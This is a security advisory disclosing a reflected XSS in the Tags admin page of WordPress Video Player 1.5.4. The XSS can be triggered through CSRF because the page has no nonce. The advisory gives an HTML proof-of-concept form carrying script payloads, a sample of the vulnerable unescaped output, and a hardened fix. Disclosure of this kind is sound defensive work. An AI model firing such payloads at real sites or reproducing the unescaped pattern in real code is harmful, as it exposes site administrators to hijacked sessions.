WordPress Video Player 1.5.4, Reflected XSS

The ‘Tags’ section of ‘WordPress Video Player’ under WordPress Administration contains two fields that are vulnerable to a Reflected XSS attack. This is because the values passed to these fields are not encoded prior to output. There is also no nonce on this page, which means the XSS can be triggered via CSRF.

Homepage

https://wordpress.org/plugins/player/

CVSS Score

4.3

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:N/A:N)

Attack Scope

remote

Authorization Required

None

Mitigation

Update to version 1.5.5.

Proof of Concept

<form action="http://localhost/wp-admin/admin.php?page=Tags_Spider_Video_Player" method="post" enctype="application/x-www-form-urlencoded">
  <input type="hidden" name="asc_or_desc" value='"><script>alert(1)</script>'/>
  <input type="hidden" name="order_by" value='"><script>alert(2)</script>'/>
  <input type="submit" value="Submit"/>
</form>
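As an added illustration (constructed for this write-up, not the plugin's own source), the pattern the summary describes beside one way a plugin author would harden it: the request values are reduced to an allow-list, escaped with esc_attr() in attribute context, and the form is protected by a WordPress nonce checked with check_admin_referer(). The field names come from the PoC above; the function names, the nonce action/name strings and the allow-listed values are assumptions.

```php
<?php
// Constructed illustration, not the Video Player plugin's source.
// Vulnerable pattern: the POST values are echoed back into attribute
// context unencoded, and the form carries no nonce.
function vp_render_tags_form_vulnerable() {
    $asc_or_desc = isset( $_POST['asc_or_desc'] ) ? $_POST['asc_or_desc'] : 'asc';
    $order_by    = isset( $_POST['order_by'] )    ? $_POST['order_by']    : 'id';
    ?>
    <form method="post">
      <input type="text" name="asc_or_desc" value="<?php echo $asc_or_desc; ?>"/>
      <input type="text" name="order_by"    value="<?php echo $order_by; ?>"/>
      <input type="submit" value="Submit"/>
    </form>
    <?php
}

// Hardened version. Three changes:
//  1. check_admin_referer() rejects requests without a valid nonce, which
//     closes the CSRF route to the reflected XSS.
//  2. The values are reduced to a fixed allow-list, so nothing attacker
//     controlled is reflected at all.
//  3. Even the allow-listed values pass through esc_attr() on output, the
//     WordPress escaping function for HTML attribute context.
function vp_render_tags_form_hardened() {
    $asc_or_desc = 'asc';
    $order_by    = 'id';

    if ( 'POST' === $_SERVER['REQUEST_METHOD'] ) {
        // Nonce action and field name are hypothetical.
        check_admin_referer( 'vp_tags_sort', 'vp_tags_nonce' );
        $dir = sanitize_key( wp_unslash( $_POST['asc_or_desc'] ?? '' ) );
        $col = sanitize_key( wp_unslash( $_POST['order_by'] ?? '' ) );
        if ( in_array( $dir, array( 'asc', 'desc' ), true ) ) {
            $asc_or_desc = $dir;
        }
        if ( in_array( $col, array( 'id', 'name', 'date' ), true ) ) {
            $order_by = $col;
        }
    }
    ?>
    <form method="post">
      <?php wp_nonce_field( 'vp_tags_sort', 'vp_tags_nonce' ); ?>
      <input type="text" name="asc_or_desc" value="<?php echo esc_attr( $asc_or_desc ); ?>"/>
      <input type="text" name="order_by"    value="<?php echo esc_attr( $order_by ); ?>"/>
      <input type="submit" value="Submit"/>
    </form>
    <?php
}
```

With the hardened form, the PoC above fails at the nonce check before any value is reflected, and even a same-page submission with an unexpected value falls back to the default rather than being echoed.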

Timeline

  • 2015-01-15: Discovered
  • 2015-01-15: Vendor notified
  • 2015-01-16: Vendor responded
  • 2015-01-16: Version 1.5.5 released – issue resolved
  • 2015-01-16: CVE Requested
  • 2015-02-02: Advisory released